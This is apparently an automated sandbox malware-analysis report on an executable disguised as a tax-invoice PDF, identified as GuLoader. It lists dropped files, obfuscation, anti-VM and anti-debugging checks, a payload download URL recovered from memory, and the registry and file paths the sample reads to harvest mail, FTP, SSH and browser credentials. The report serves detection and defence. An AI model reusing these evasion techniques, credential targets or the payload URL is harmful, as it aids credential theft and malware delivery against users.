Source: NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe, 00000000.00000002.672665051.0000000000414000.00000004.00020000.sdmp Binary or memory string: OriginalFilenameForm_Pilleorms8.exePADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDI
PE file contains strange resources
Source: Form_Pilleorms8.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe Virustotal: Detection: 50%
Source: NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe ReversingLabs: Detection: 53%
Source: C:\Users\user\Desktop\NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe File read: C:\Users\user\Desktop\NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe Jump to behavior
Source: NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe "C:\Users\user\Desktop\NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe"
Source: C:\Users\user\Desktop\NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe Process created: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Process created: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe
Source: C:\Users\user\Desktop\NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe Process created: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Process created: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Jump to behavior
Source: C:\Users\user\Desktop\NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe Code function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_0040352D
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto Jump to behavior
Source: C:\Users\user\Desktop\NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe File created: C:\Users\user\AppData\Local\Temp\nsn9823.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@5/4@2/3
Source: C:\Users\user\Desktop\NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe Code function: 0_2_004021AA CoCreateInstance, 0_2_004021AA
Source: C:\Users\user\Desktop\NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe Code function: 0_2_0040498A GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_0040498A
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Mutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook Jump to behavior
Source: NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Data Obfuscation:

barindex
Yara detected GuLoader
Source: Yara match File source: 00000009.00000000.787227598.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.788404453.0000000008160000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Code function: 1_2_0816273A push FFFFFF9Eh; ret 1_2_0816277B
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Code function: 1_2_08162A4B push ss; retf 1_2_08162A55
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Code function: 9_2_00570397 pushfd ; ret 9_2_00570398

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Users\user\Desktop\NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe File created: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe File created: C:\Users\user\AppData\Roaming\C79A3B\B52B3F.exe (copy) Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Users\user\Desktop\NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Process information set: NOGPFAULTERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect Any.run
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: Form_Pilleorms8.exe, 00000009.00000002.890831982.0000000002310000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1VEL8-EKCR0IVRL8U50SHCZNZH1TCA62N
Source: Form_Pilleorms8.exe, 00000001.00000002.788505420.0000000008AA0000.00000004.00000001.sdmp, Form_Pilleorms8.exe, 00000009.00000002.890831982.0000000002310000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: Form_Pilleorms8.exe, 00000001.00000002.788505420.0000000008AA0000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe TID: 5384 Thread sleep count: 450 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe TID: 6248 Thread sleep time: -60000s >= -30000s Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Window / User API: threadDelayed 450 Jump to behavior
Source: C:\Users\user\Desktop\NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe Code function: 0_2_00406873 FindFirstFileW,FindClose, 0_2_00406873
Source: C:\Users\user\Desktop\NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe Code function: 0_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405C49
Source: C:\Users\user\Desktop\NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe Code function: 0_2_0040290B FindFirstFileW, 0_2_0040290B
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Thread delayed: delay time: 60000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe System information queried: ModuleInformation Jump to behavior
Source: Form_Pilleorms8.exe, 00000001.00000002.788686469.0000000008CBA000.00000004.00000001.sdmp, Form_Pilleorms8.exe, 00000009.00000002.890840304.00000000023DA000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: Form_Pilleorms8.exe, 00000001.00000002.788505420.0000000008AA0000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: Form_Pilleorms8.exe, 00000009.00000002.890831982.0000000002310000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=https://drive.google.com/uc?export=download&id=1vel8-ekCr0ivRl8u50SHCZNZh1tCa62N
Source: Form_Pilleorms8.exe, 00000001.00000002.788686469.0000000008CBA000.00000004.00000001.sdmp, Form_Pilleorms8.exe, 00000009.00000002.890840304.00000000023DA000.00000004.00000001.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: Form_Pilleorms8.exe, 00000009.00000002.890840304.00000000023DA000.00000004.00000001.sdmp Binary or memory string: vmicshutdown
Source: Form_Pilleorms8.exe, 00000001.00000002.788686469.0000000008CBA000.00000004.00000001.sdmp, Form_Pilleorms8.exe, 00000009.00000002.890840304.00000000023DA000.00000004.00000001.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: Form_Pilleorms8.exe, 00000001.00000002.788686469.0000000008CBA000.00000004.00000001.sdmp, Form_Pilleorms8.exe, 00000009.00000002.890840304.00000000023DA000.00000004.00000001.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: Form_Pilleorms8.exe, 00000001.00000002.788686469.0000000008CBA000.00000004.00000001.sdmp, Form_Pilleorms8.exe, 00000009.00000002.890840304.00000000023DA000.00000004.00000001.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: Form_Pilleorms8.exe, 00000009.00000002.890840304.00000000023DA000.00000004.00000001.sdmp Binary or memory string: vmicvss
Source: Form_Pilleorms8.exe, 00000001.00000002.788505420.0000000008AA0000.00000004.00000001.sdmp, Form_Pilleorms8.exe, 00000009.00000002.890831982.0000000002310000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: Form_Pilleorms8.exe, 00000001.00000002.788686469.0000000008CBA000.00000004.00000001.sdmp, Form_Pilleorms8.exe, 00000009.00000002.890840304.00000000023DA000.00000004.00000001.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: Form_Pilleorms8.exe, 00000001.00000002.788686469.0000000008CBA000.00000004.00000001.sdmp, Form_Pilleorms8.exe, 00000009.00000002.890840304.00000000023DA000.00000004.00000001.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: Form_Pilleorms8.exe, 00000001.00000002.788686469.0000000008CBA000.00000004.00000001.sdmp, Form_Pilleorms8.exe, 00000009.00000002.890840304.00000000023DA000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: Form_Pilleorms8.exe, 00000009.00000002.890840304.00000000023DA000.00000004.00000001.sdmp Binary or memory string: vmicheartbeat

Anti Debugging:

barindex
Hides threads from debuggers
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Thread information set: HideFromDebugger Jump to behavior
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Code function: 1_2_0816C813 mov eax, dword ptr fs:[00000030h] 1_2_0816C813
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Code function: 1_2_0816BA58 mov eax, dword ptr fs:[00000030h] 1_2_0816BA58
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Code function: 1_2_0816DC4B mov eax, dword ptr fs:[00000030h] 1_2_0816DC4B
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Code function: 1_2_081690F1 mov eax, dword ptr fs:[00000030h] 1_2_081690F1
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Code function: 1_2_081694DA LdrInitializeThunk, 1_2_081694DA

HIPS / PFW / Operating System Protection Evasion:

barindex
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Process created: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\Desktop\NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe Code function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_0040352D

Stealing of Sensitive Information:

barindex
GuLoader behavior detected
Source: Initial file Signature Results: GuLoader behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Jump to behavior
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs